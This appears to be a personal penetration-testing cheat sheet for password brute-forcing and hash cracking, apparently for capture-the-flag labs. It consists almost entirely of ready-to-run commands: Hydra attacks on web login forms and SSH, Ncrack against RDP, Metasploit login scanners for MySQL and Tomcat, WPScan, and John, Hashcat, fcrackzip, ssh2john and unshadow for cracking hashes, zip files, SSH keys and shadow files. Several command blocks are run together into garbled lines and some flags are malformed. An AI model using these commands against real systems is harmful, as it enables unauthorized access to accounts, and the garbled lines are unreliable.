Brute Force Password Attacks & Cracking

John The Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt -format=$format hash.txt

Hydra

To brute force the web form using Hydra the following information is required:

• IP address

• GET/POST request: http-get-form or http-post-form

• Username: -l for a static username or -L for a list of usernames

• Password: -p for a static password or -P for a password list

• Number of threads is optional: -t

hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error

hydra $ip -l $username -P [password list] [http form type] ":​hydra -L <username list> -p <password list> [host] http-post-form "::"​hydra -L <wordlist> -P <password list> [host] http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"​​hydra -l [username] -P /usr/share/wordlists/rockyou.txt [host] http-post-form "/wp-admin/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=http%3A%2F%2F[host]%2Fwp-admin%2F" -V​hydra -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh​hydra -s 22022 -l root -P /usr/share/wordlists/fasttrack.txt [host] ssh​hydra -s 22022 -L userlist.txt -P /usr/share/wordlists/fasttrack.txt [host] ssh -t 4  -v​hydra $TARGET http-post-form -L /usr/share/wordlists/list "/endpoit/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s PORT -P /usr/share/wordlists/list

Hashcat

hashcat -m $hashtype -a $attackmode -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt​hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt --force

• m is the hash format (e.g. m 13100 is Kerberos 5)

• a 0 is a dictionary attack

• o cracked.txt is the output file for the cracked password

• target_hashes.txt is the hash to be cracked

• /usr/share/wordlists/rockyou.txt is the absolute path to the wordlist

• --force is something I always have to add (think it's GPU-related)

Ncrack

Ncrack can be used to crack RDP passwords:

ncrack -vv --user username -P password-file.txt rdp://[host]

msf > use auxiliary/scanner/mysql/mysql_loginmsf auxiliary(mysql_login) > set rhosts [target]msf auxiliary(mysql_login) > set rport [port]msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txtmsf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txtmsf auxiliary(mysql_login) > run

By default, Metasploit will use its list of default Tomcat usernames and passwords, but you could set a single username with set username or run a custom list with set user_file. You can also run a longer password list with set pass_file. Depending on how fast the server responds, you could use a big wordlist but otherwise stick to fasttrack.txt.

msf > use auxiliary/scanner/http/tomcat_mgr_loginmsf auxiliary(tomcat_mgr_login) > set rhosts [target]msf auxiliary(tomcat_mgr_login) > set rport [port, usually 8080]msf auxiliary(tomcat_mgr_login) > set ssl truemsf auxiliary(tomcat_mgr_login) > set stop_on_success truemsf auxiliary(tomcat_mgr_login) > run

Cracking Wordpress Password with WPScan

wpscan --url http://blog.thm -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75

Crack Zipfiles

https://www.geeksforgeeks.org/recover-password-password-protected-zip-file/
fcrackzip -v -D -u -p /usr/share/dict/words secret.zip

Find SSH Keyphrase with John - Crack SSH Private Key

First we’ll need to convert the ssh key using ssh2john with this command. Crack ssh.

python ssh2john.py SecretKey > SecretKey.hash
#After give it to john…
sudo john SecretKey.hash -wordlist=INSERTWORDLIST!

Crack shadow or Passwd File

unshadow passwd.txt shadow.txt > passwords.txt
john --wordlist=/usr/share/wordlists/sqlmap.txt passwords.txt
john --show passwords.txt